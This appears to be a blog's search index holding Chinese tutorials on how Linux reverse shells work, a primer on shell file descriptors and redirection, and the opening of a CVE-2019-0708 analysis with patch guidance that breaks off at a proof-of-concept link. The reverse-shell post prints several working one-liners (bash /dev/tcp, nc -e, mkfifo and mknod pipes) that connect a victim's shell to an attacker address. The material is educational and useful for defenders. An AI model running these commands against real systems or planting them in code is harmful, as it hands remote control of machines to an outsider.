search.xml

<?xml version="1.0" encoding="utf-8"?>
<search> 
  
  
    
    <entry>
      <title>Linux 反弹shell（二）反弹shell的本质</title>
      <link href="/Coderzgh.github.io/2019/06/16/rebound-shell-two/"/>
      <url>/Coderzgh.github.io/2019/06/16/rebound-shell-two/</url>
      
        <content type="html"><![CDATA[<ul><li><h2 id="0X00-前言"><a href="#0X00-前言" class="headerlink" title="0X00 前言"></a><strong>0X00 前言</strong></h2><p>在上一篇文章 <a href="https://xz.aliyun.com/t/2548" target="_blank" rel="noopener">Linux反弹shell（一）文件描述符与重定向</a>，我们已经讨论过了反弹shell中最核心也是相对较难理解的部分，那么接下来我们就可以正式借反弹shell的实例分析回顾前一篇文章讲的知识，并且也加深对反弹shell的理解吧。</p><h2 id="0X01-什么是反弹shell"><a href="#0X01-什么是反弹shell" class="headerlink" title="0X01 什么是反弹shell"></a><strong>0X01 什么是反弹shell</strong></h2><p>reverse shell，就是控制端监听在某TCP/UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。</p><h2 id="0X02-为什么要反弹shell"><a href="#0X02-为什么要反弹shell" class="headerlink" title="0X02 为什么要反弹shell"></a><strong>0X02 为什么要反弹shell</strong></h2><p>通常用于被控端因防火墙受限、权限不足、端口被占用等情形</p><p>假设我们攻击了一台机器，打开了该机器的一个端口，攻击者在自己的机器去连接目标机器（目标ip：目标机器端口），这是比较常规的形式，我们叫做正向连接。远程桌面，web服务，ssh，telnet等等，都是正向连接。那么什么情况下正向连接不太好用了呢？</p><p>1.某客户机中了你的网马，但是它在局域网内，你直接连接不了。</p><p>2.它的ip会动态改变，你不能持续控制。</p><p>3.由于防火墙等限制，对方机器只能发送请求，不能接收请求。</p><p>4.对于病毒，木马，受害者什么时候能中招，对方的网络环境是什么样的，什么时候开关机，都是未知，所以建立一个服务端，让恶意程序主动连接，才是上策。</p><p>那么反弹就很好理解了， 攻击者指定服务端，受害者主机主动连接攻击者的服务端程序，就叫反弹连接。</p><h2 id="0X03-反弹shell的本质是什么"><a href="#0X03-反弹shell的本质是什么" class="headerlink" title="0X03 反弹shell的本质是什么"></a><strong>0X03 反弹shell的本质是什么</strong></h2><p>我们可以先以一个linux 下的反弹shell 的命令为例来看一下反弹shell 的命令都做了些什么，掌握了反弹的本质，再多的方法其实只是换了包装而已。</p><p><strong>实验环境：</strong></p><p><strong>受害者：</strong></p><p>Ubuntu Linux ——&gt; 192.168.146.128</p><p><strong>攻击者：</strong></p><p>Kali Linux   ——&gt; 192.168.146.129</p><p>我们就以最常见的bash为例：<br> attacker机器上执行：</p><pre><code>nc -lvp 2333</code></pre><p>victim 机器上执行：</p><pre><code>bash -i &gt;&amp; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1</code></pre><p>你就会看到下图：</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cef38600-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cef38600-9c80-1.png" alt="img"></a></p><p>可以看到在攻击机上出现了受害者机器的shell</p><p>解释一下这条命令具体的含义：</p><p><strong>1.bash -i</strong></p><p>1）bash 是linux 的一个比较常见的shell,其实linux的shell还有很多，比如 sh、zsh、等，他们之间有着细小差别</p><p>2）-i 这个参数表示的是产生交互式的shell</p><p><strong>2./dev/tcp/ip/port</strong></p><p>/dev/tcp|udp/ip/port 这个文件是特别特殊的，实际上可以将其看成一个设备（Linux下一切皆文件），其实如果你访问这个文件的位置他是不存在的，如下图：</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf021f9e-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf021f9e-9c80-1.png" alt="img"></a></p><p>但是如果你在一方监听端口的情况下对这个文件进行读写，就能实现与监听端口的服务器的socket通信</p><p><strong>实例1：</strong></p><p>我们输出字符串到这个文件里</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf0c2d36-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf0c2d36-9c80-1.png" alt="img"></a></p><p>攻击机上的输出</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf17f062-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf17f062-9c80-1.png" alt="img"></a></p><p><strong>实例2：</strong></p><p>攻击机上的输入</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf26ad46-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf26ad46-9c80-1.png" alt="img"></a></p><p>受害者机器上的输出</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf3172ee-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf3172ee-9c80-1.png" alt="img"></a></p><p><strong>3.交互重定向</strong></p><p><strong>注意：</strong><br> 下面的内容涉及到比较复杂的重定向和文件描述符的知识，如果理解不够深入建议看完我的上一篇文章以后再来继续阅读：</p><p><strong>文章链接：</strong><br> <a href="https://xz.aliyun.com/t/2548" target="_blank" rel="noopener">Linux反弹shell（一）文件描述符与重定向</a></p><p>为了实现交互，我们需要把受害者交互式shell的输出重定向到攻击机上<br> 在受害者机器上输入</p><pre><code>bash -i &gt; /dev/tcp/192.168.146.129/2333</code></pre><p>示意图：</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf42bf0e-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf42bf0e-9c80-1.png" alt="img"></a></p><p>如下图所示，任何在受害者机器上执行的指令都不会直接回显了，而是在攻击者机器上回显。</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf500092-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf500092-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf5c2610-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf5c2610-9c80-1.png" alt="img"></a></p><p>但是这里有一个问题，攻击者没有能够实现对受害者的控制，攻击者执行的命令没法在受害者电脑上执行。</p><p>于是我们似乎还需要一条这样的指令</p><pre><code>bash -i &lt; /dev/tcp/192.168.146.129/2333</code></pre><p>示意图：</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf6dc0aa-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf6dc0aa-9c80-1.png" alt="img"></a></p><p>这条指令的意思是将攻击者输入的命令输入给受害者的bash，自然就能执行了</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf7850f6-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf7850f6-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf863ae0-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf863ae0-9c80-1.png" alt="img"></a></p><p>现在我们需要将两条指令结合起来（如果这条指令看不懂可以去看一下我上面提供的文章的链接再回来看这条指令）：</p><pre><code>bash -i &gt; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1</code></pre><p>示意图：</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf98d0ec-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf98d0ec-9c80-1.png" alt="img"></a></p><p><strong>由这张示意图可以很清楚地看到，输入0是由/dev/tcp/192.168.146.129/2333  输入的，也就是攻击机的输入，命令执行的结果1，会输出到/dev/tcp/192.168.156.129/2333上，这就形成了一个回路，实现了我们远程交互式shell  的功能</strong></p><p>如下图所示，我在攻击机上输入 ifconfig，查看到的是受害者的ip ，也就是说我们目前已经基本完成了一个反弹shell 的功能。</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cfb2189a-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cfb2189a-9c80-1.png" alt="img"></a></p><p><strong>注意：</strong><br> 但是这里有一个问题，就是我们在受害者机器上依然能看到我们在攻击者机器中执行的指令 ，如下图所示，我们马上解决</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cfbf9362-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cfbf9362-9c80-1.png" alt="img"></a></p><p><strong>4. &gt;&amp;、&amp;&gt;</strong></p><p>这个符号在我附上链接的那篇文章中也提到了，作用就是混合输出（错误、正确输出都输出到一个地方）</p><p>现在我们解决一下前面的问题：</p><pre><code>bash -i &gt; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1 2&gt;&amp;1</code></pre><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-cfe54a1c-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-cfe54a1c-9c80-1.png" alt="img"></a></p><p>可以看到命令并没有回显在受害者机器上，我们的目的达成了</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-cff2d39e-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-cff2d39e-9c80-1.png" alt="img"></a></p><p>当然我们也可以执行与之完全等价的指令</p><pre><code>bash -i &gt;&amp; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1</code></pre><p><strong>至此，我们的反弹shell的经典语句就分析完了，通过这条语句的分析我们能大致的了解反弹shell的本质，以后碰到其他的反弹shell 的语句也能用类似的分析方法区分析，甚至我们也可以自己举一反三创造更加绝妙的反弹shell 的语句</strong></p><h2 id="0X04-常见的反弹shell-的语句怎么理解"><a href="#0X04-常见的反弹shell-的语句怎么理解" class="headerlink" title="0X04 常见的反弹shell 的语句怎么理解"></a><strong>0X04 常见的反弹shell 的语句怎么理解</strong></h2><h3 id="1-方法一"><a href="#1-方法一" class="headerlink" title="1.方法一"></a><strong>1.方法一</strong></h3><pre><code>bash -i&gt;&amp; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1</code></pre><p>和</p><pre><code>bash -i&gt;&amp; /dev/tcp/192.168.146.129/2333 0&lt;&amp;1</code></pre><p>这里的唯一区别就是 0&gt;&amp;1 和 0&lt;&amp;1 ，其实就是打开方式的不同，而对于这个文件描述符来讲并没有什么区别（我在上面给出链接的文章中也特地用加粗的形式解释了）</p><h3 id="2-方法二"><a href="#2-方法二" class="headerlink" title="2.方法二"></a><strong>2.方法二</strong></h3><pre><code>bash -i &gt;&amp; /dev/tcp/192.168.146.129/2333 &lt;&amp;2</code></pre><p>等价于</p><pre><code>bash -i &gt;&amp; /dev/tcp/192.168.146.129/2333 0&lt;&amp;2</code></pre><p>示意图：</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-d004effc-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-d004effc-9c80-1.png" alt="img"></a></p><h3 id="3-方法三"><a href="#3-方法三" class="headerlink" title="3.方法三"></a><strong>3.方法三</strong></h3><pre><code>exec 5&lt;&gt;/dev/tcp/192.168.146.129/2333;cat &lt;&amp;5|while read line;do $line &gt;&amp;5 2&gt;&amp;1;done</code></pre><p><strong>简单的解释一下：</strong></p><pre><code>exec 5&lt;&gt;/dev/tcp/192.168.146.129/2333</code></pre><p>这一句将文件描述符5重定向到了 /dev/tcp/192.168.146.129/2333 并且方式是<strong>读写方式</strong>（这种方法在我的前面的文章中也讲到过），于是我们就能通过文件描述符对这个socket连接进行操作了</p><pre><code>command|while read line do .....done</code></pre><p>这个是一个非常经典的句子，它的原句是这样的</p><pre><code>while read linedo       …done &lt; file</code></pre><p>从文件中依次读取每一行，将其赋值给 line 变量（当然这里变量可以很多，以空格分隔，这里我就举一个变量的例子，如果是一个变量的话，那么一整行都是它的了），之后再在循环中对line进行操作。</p><p>而现在我们不是从file 文件中输入了，我们使用管道符对攻击者机器上输入的命令依次执行，并将标准输出和标准错误输出都重定向到了文件描述符5，也就是攻击机上，实现交互式shell的功能。</p><p>与之完全类似的还有下面这条指令，读者有兴趣可以自己分析一下：</p><pre><code>0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/attackerip/4444; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</code></pre><h3 id="4-方法四"><a href="#4-方法四" class="headerlink" title="4.方法四"></a><strong>4.方法四</strong></h3><p>nc 如果安装了正确的版本（存在-e 选项就能直接反弹shell）</p><pre><code>nc -e /bin/sh 192.168.146.129 2333</code></pre><p>但是如果是没有-e 选项是不是就不能实现了呢？当然不是，我们可以向下面这样</p><pre><code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.146.129 2333 &gt;/tmp/f</code></pre><p><strong>简单的解释：</strong></p><p>mkfifo 命令首先创建了一个管道，cat 将管道里面的内容输出传递给/bin/sh，sh会执行管道里的命令并将标准输出和标准错误输出结果通过nc 传到该管道，由此形成了一个回路</p><p>类似的命令：</p><pre><code>mknod backpipe p; nc 192.168.146.129 2333 0&lt;backpipe | /bin/bash 1&gt;backpipe 2&gt;backpipe</code></pre><h2 id="0X05-总结"><a href="#0X05-总结" class="headerlink" title="0X05 总结"></a><strong>0X05 总结</strong></h2><p>反弹shell方法虽然常见，方法网上一搜就是一大把的代码，但是很少有人会去仔细斟酌反弹shell的原理，我也看到有类似的文章，但是可能是由于篇幅原因并没有对文件描述符和重定向的部分做深入的讨论，导致解释语句的时候依然让人不好理解，于是这次我分成了两篇有所关联的文章彻底的剖析了一下，个人认为这个原理是非常值得大家思考的，也很有趣，如果我的文章有什么地方有问题，希望大家及时联系我。</p><p>个人博客： <a href="http://www.k0rz3n.com" target="_blank" rel="noopener">http://www.k0rz3n.com</a></p><h2 id="0X06-参考链接"><a href="#0X06-参考链接" class="headerlink" title="0X06 参考链接"></a><strong>0X06 参考链接</strong></h2><p><a href="https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html" target="_blank" rel="noopener">https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html</a><br> <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" target="_blank" rel="noopener">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a><br> <a href="https://blog.csdn.net/roler_/article/details/17504039" target="_blank" rel="noopener">https://blog.csdn.net/roler_/article/details/17504039</a><br> <a href="http://www.freebuf.com/articles/system/153986.html" target="_blank" rel="noopener">http://www.freebuf.com/articles/system/153986.html</a><br> <a href="https://www.zhihu.com/question/24503813" target="_blank" rel="noopener">https://www.zhihu.com/question/24503813</a></p></li></ul>]]></content>
      
      
      <categories>
          
          <category> shell </category>
          
      </categories>
      
      
        <tags>
            
            <tag> 反弹shell </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Linux反弹shell（一）文件描述符与重定向</title>
      <link href="/Coderzgh.github.io/2019/06/15/rebound-shell-one/"/>
      <url>/Coderzgh.github.io/2019/06/15/rebound-shell-one/</url>
      
        <content type="html"><![CDATA[<ul><li><h2 id="0X00-前言"><a href="#0X00-前言" class="headerlink" title="0X00 前言"></a><strong>0X00 前言</strong></h2><p>由于在反弹shell的过程中有一些非常精简的语句，但是一直没有深入理解，只是作为一个伸手党/搬运工，于是下定决心要将其弄明白，而这里面最难的也就是文件描述符和重定向的部分，因此我特地写一篇文章单独解释这个问题。</p><h2 id="0X01-文件描述符"><a href="#0X01-文件描述符" class="headerlink" title="0X01 文件描述符"></a><strong>0X01 文件描述符</strong></h2><blockquote><p><strong>linux文件描述符</strong>：可以理解为linux跟踪打开文件，而分配的一个数字，这个数字有点类似c语言操作文件时候的句柄，通过句柄就可以实现文件的读写操作。</p></blockquote><p>当Linux启动的时候会默认打开三个文件描述符，分别是：</p><p>标准输入standard input 0 （默认设备键盘）<br> 标准输出standard output 1（默认设备显示器）<br> 错误输出：error output 2（默认设备显示器）</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d73c1264-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d73c1264-9c80-1.png" alt="img"></a></p><h3 id="注意："><a href="#注意：" class="headerlink" title="注意："></a><strong>注意：</strong></h3><p>（1）以后再打开文件，描述符可以依次增加<br> （2）一条shell命令，都会继承其父进程的文件描述符，因此所有的shell命令，都会默认有三个文件描述符。</p><p><strong>文件所有输入输出都是由该进程所有打开的文件描述符控制的。（Linux一切皆文件，就连键盘显示器设备都是文件，因此他们的输入输出也是由文件描述符控制）</strong></p><p>一条命令执行以前先会按照默认的情况进行绑定（也就是上面所说的 0,1,2），如果我们有时候需要让输出不显示在显示器上，而是输出到文件或者其他设备，那我们就需要重定向。</p><h2 id="0X02-重定向"><a href="#0X02-重定向" class="headerlink" title="0X02 重定向"></a><strong>0X02 重定向</strong></h2><p>重定向主要分为两种(其他复杂的都是从这两种衍生而来的)：</p><p>（1）输入重定向 &lt; &lt;&lt;<br> （2）输出重定向 &gt; &gt;&gt;</p><h3 id="重点："><a href="#重点：" class="headerlink" title="重点："></a><strong>重点：</strong></h3><p>1.bash 在执行一条指令的时候，首先会检查命令中存不存在重定向的符号，如果存在那么首先将文件描述符重定向（之前说过了，输入输出操作都是依赖文件描述符实现的，重定向输入输出本质上就是重定向文件描述符），然后在把重定向去掉，执行指令</p><p>2.如果指令中存在多个重定向，那么不要随便改变顺序，因为重定向是从左向右解析的，改变顺序可能会带来完全不同的结果（这一点我们后面会展示）</p><p>3.&lt; 是对标准输入 0 重定向 ，&gt; 是对标准输出 1 重定向</p><p><strong>4.再强调一下，重定向就是针对文件描述符的操作</strong></p><h3 id="1-输入重定向"><a href="#1-输入重定向" class="headerlink" title="1.输入重定向"></a><strong>1.输入重定向</strong></h3><p>格式：  [n]&lt; word <strong>（注意[n]与&lt;之间没有空格）</strong></p><p>说明：将文件描述符 n 重定向到 word 指代的文件（以只读方式打开）,如果n省略就是0（标准输入）</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d749a4e2-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d749a4e2-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d7566fc4-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d7566fc4-9c80-1.png" alt="img"></a></p><p>解释: 解析器解析到 “&lt;” 以后会先处理重定向，将标准输入重定向到file，之后cat再从标准输入读取指令的时候，由于标准输入已经重定向到了file ，于是cat就从file中读取指令了。(<strong>有没有觉得这个其实就是C语言中的指针或者文件句柄，就是将0这个指针指向了不同的地址，自然有不同的输入</strong>)</p><p>图示:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d763ff72-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d763ff72-9c80-1.png" alt="img"></a></p><h3 id="2-输出重定向"><a href="#2-输出重定向" class="headerlink" title="2.输出重定向"></a><strong>2.输出重定向</strong></h3><p>格式：   [n]&gt; word</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d774b3bc-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d774b3bc-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d77f7b1c-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d77f7b1c-9c80-1.png" alt="img"></a></p><p>说明： 将文件描述符 n 重定向到word 指代的文件（以写的方式打开），如果n 省略则默认就是 1（标准输出）</p><p>图示：</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d79014c2-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d79014c2-9c80-1.png" alt="img"></a></p><h3 id="3-标准输出与标准错误输出重定向"><a href="#3-标准输出与标准错误输出重定向" class="headerlink" title="3.标准输出与标准错误输出重定向"></a><strong>3.标准输出与标准错误输出重定向</strong></h3><p>格式： &amp;&gt; word     &gt;&amp; word</p><p>说明:将标准输出与标准错误输出都定向到word代表的文件（以写的方式打开），两种格式意义完全相同，这种格式完全等价于 &gt; word  2&gt;&amp;1 (2&gt;&amp;1  是将标准错误输出复制到标准输出，&amp;是为了区分文件1和文件描述符1的，详细的介绍后面会有)</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d79df60a-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d79df60a-9c80-1.png" alt="img"></a></p><p>解释：我们首先执行了一个错误的命令，可以看到错误提示被写入文件（正常情况下是会直接输出的），我们又执行了一条正确的指令，发现结果也输入到了文件，说明正确错误消息都能输出到文件。</p><p>图示：</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7abf9e4-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7abf9e4-9c80-1.png" alt="img"></a></p><h3 id="4-文件描述符的复制"><a href="#4-文件描述符的复制" class="headerlink" title="4.文件描述符的复制"></a><strong>4.文件描述符的复制</strong></h3><p>格式： [n]&lt;&amp;[m] / [n]&gt;&amp;[m] <strong>(这里所有字符之间不要有空格)</strong></p><p>说明：</p><p>1）这里两个<strong>都是将文件描述符 n 复制到 m</strong> ，两者的区别是，前者是以只读的形式打开，后者是以写的形式打开</p><p><strong>因此 0&lt;&amp;1 和 0&gt;&amp;1 是完全等价的（读/写方式打开对其没有任何影响）</strong></p><p>2）这里的&amp; 目的是为了区分数字名字的文件和文件描述符，如果没有&amp; 系统会认为是将文件描述符重定向到了一个数字作为文件名的文件，而不是一个文件描述符</p><p>这里就可以用上面的例子作为演示，将错误和正确的输出都输入到文件中</p><h3 id="重点：-1"><a href="#重点：-1" class="headerlink" title="重点："></a><strong>重点：</strong></h3><p>之前我们说过，重定向符号的顺序不能随便换，因为系统是从左到右执行的，我们下面就举一个例子</p><p>(1)cmd &gt; file 2&gt;&amp;1<br> (2)cmd 2&gt;&amp;1 &gt;file</p><p>与第一条指令类似的指令在上面我已经介绍过了，我们现在就来看看第二条指令的执行过程</p><p><strong>1.首先解析器解析到 2&gt;&amp;1</strong></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7bcbb94-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7bcbb94-9c80-1.png" alt="img"></a></p><p><strong>2.解析器再向后解析到 “&gt;”</strong></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7cdb7be-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7cdb7be-9c80-1.png" alt="img"></a></p><h3 id="5-exec-绑定重定向"><a href="#5-exec-绑定重定向" class="headerlink" title="5.exec 绑定重定向"></a><strong>5.exec 绑定重定向</strong></h3><p>格式：exec [n] &lt;/&gt; file/[n]</p><p>上面的输入输出重定向将输入和输出绑定文件或者设备以后只对当前的那条指令有效，如果需要接下来的指令都支持的话就需要使用 exec 指令</p><h3 id="重点：-2"><a href="#重点：-2" class="headerlink" title="重点："></a><strong>重点：</strong></h3><p>格式： [n]&lt;&gt;word</p><p>说明：以读写方式打开word指代的文件，并将n重定向到该文件。如果n不指定的话，默认为标准输入。</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7da9894-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7da9894-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7e99074-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7e99074-9c80-1.png" alt="img"></a></p><h2 id="0X03-总结"><a href="#0X03-总结" class="headerlink" title="0X03 总结"></a><strong>0X03 总结</strong></h2><p>文件描述符和重定向的作用巨大，很好的体现出了Linux中一切皆文件的特性，在反弹shell建立交互通道的过程中也起到了至关重要的作用。</p><p>个人博客： <a href="http://www.k0rz3n.com" target="_blank" rel="noopener">http://www.k0rz3n.com</a></p><h2 id="0X04-参考链接"><a href="#0X04-参考链接" class="headerlink" title="0X04 参考链接"></a><strong>0X04 参考链接</strong></h2><p><a href="https://blog.csdn.net/ccwwff/article/details/48519119" target="_blank" rel="noopener">https://blog.csdn.net/ccwwff/article/details/48519119</a><br> <a href="http://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html" target="_blank" rel="noopener">http://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html</a><br> <a href="http://www.178linux.com/54471" target="_blank" rel="noopener">http://www.178linux.com/54471</a></p></li></ul>]]></content>
      
      
      <categories>
          
          <category> shell </category>
          
      </categories>
      
      
        <tags>
            
            <tag> 反弹shell </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title></title>
      <link href="/Coderzgh.github.io/2019/06/11/cve-2019-0708-lou-dong-qian-xi/"/>
      <url>/Coderzgh.github.io/2019/06/11/cve-2019-0708-lou-dong-qian-xi/</url>
      
        <content type="html"><![CDATA[<h1 id="关于CVE-2019-0708漏洞浅析，和POC验证整理"><a href="#关于CVE-2019-0708漏洞浅析，和POC验证整理" class="headerlink" title="关于CVE-2019-0708漏洞浅析，和POC验证整理"></a>关于CVE-2019-0708漏洞浅析，和POC验证整理</h1><h4 id="1-漏洞情况："><a href="#1-漏洞情况：" class="headerlink" title="1. 漏洞情况："></a>1. 漏洞情况：</h4><p>  微软公司于2019年5月14日发布重要安全公告，其操作系统远程桌面（Remote Desktop Services），俗称的3389服务存在严重安全漏洞（编号CVE-2019-0708）：攻击者在没有任何授权的情况下，可以远程直接攻击操作系统开放的3389服务，在受害主机上执行恶意攻击行为，包括安装后门，查看、篡改隐私数据，创建拥有完全用户权限的新账户，影响范围从Windows XP到Windows 2008 R2。由于3389服务应用广泛且该漏洞利用条件低，只要服务端口开放即可，导致该漏洞影响和危害程序堪比“WannaCry”。因此，微软额外为Windows XP、Windows 2003这些已经停止支持的系统发布了该漏洞的安全补丁。 </p><h4 id="2-漏洞概要："><a href="#2-漏洞概要：" class="headerlink" title="2. 漏洞概要："></a><strong>2. 漏洞概要</strong>：</h4><p>*<img src="https://image.3001.net/images/20190605/1559722366_5cf7797ebfc2c.jpg!small" alt="QQ截图20190605101736.jpg">**</p><h4 id="3-预防与修复建议："><a href="#3-预防与修复建议：" class="headerlink" title="3. 预防与修复建议："></a>3. 预防与修复建议：</h4><ol><li>升级微软官方补丁：</li></ol><p>Windos XP、Windows 2003等老旧系统需手动下载补丁：<a href="https://support.microsoft.com/en-ca/help/4500705/customer-guidance-for-cve-2019-0708；" target="_blank" rel="noopener">https://support.microsoft.com/en-ca/help/4500705/customer-guidance-for-cve-2019-0708；</a></p><p>Windows 7、Windows 2008系统自动升级即可，手动升级可到如下链接下载补丁：<a href="https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175；" target="_blank" rel="noopener">https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175；</a></p><ol start="2"><li>如非必要，请关闭远程桌面服务；</li></ol><h4 id="4-打补丁前后比较"><a href="#4-打补丁前后比较" class="headerlink" title="4. 打补丁前后比较:"></a>4. 打补丁前后比较:</h4><p>  通过分析打补丁前后差异在于 termdd.sys 文件的 IcaBindVirtualChannels 及  IcaReBindVirtualChannels ，增加了对 MS_T120 协议通道的判定，如果是通道协议名为 MS_T120 ，则设定  IcaBindChannel 的第三个参数为 31 。</p><p><a href="https://image.3001.net/images/20190605/1559722413_5cf779ad53a16.jpg" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20190605/1559722413_5cf779ad53a16.jpg!small" alt="2.jpg"></a></p><p>服务端在初始化时，会创建名为MS_T120、 Index 为 31 的通道，在收到 MCS Connect Initial  数据封包后进行通道创建和绑定操作，在 IcaBindVirtualChannels 函数中进行绑定时， IcaFindChannelByName  函数只根据通道名进行通道查找。当通道名为 MS_T120 (不区分大小写)时，会找到系统内部通道 MS_T120  的通道并与之绑定，绑定后，通道索引会即被更改为新的通道索引。 </p><h4 id="5-漏洞复现和POC验证："><a href="#5-漏洞复现和POC验证：" class="headerlink" title="5. 漏洞复现和POC验证："></a>5. 漏洞复现和POC验证：</h4><table><thead><tr><th>验证环境和脚本</th><th></th></tr></thead><tbody><tr><td>Windows7（靶机）</td><td>（VM下NAT模式或桥接模式）</td></tr><tr><td>kali Linux（验证机）</td><td></td></tr><tr><td>Python3</td><td>需要安装POC依赖 OpenSSL，impacket.structure</td></tr><tr><td>Poc（验证脚本-蓝屏）</td><td><a href="https://github.com/1amfine2333/CVE-2019-0708" target="_blank" 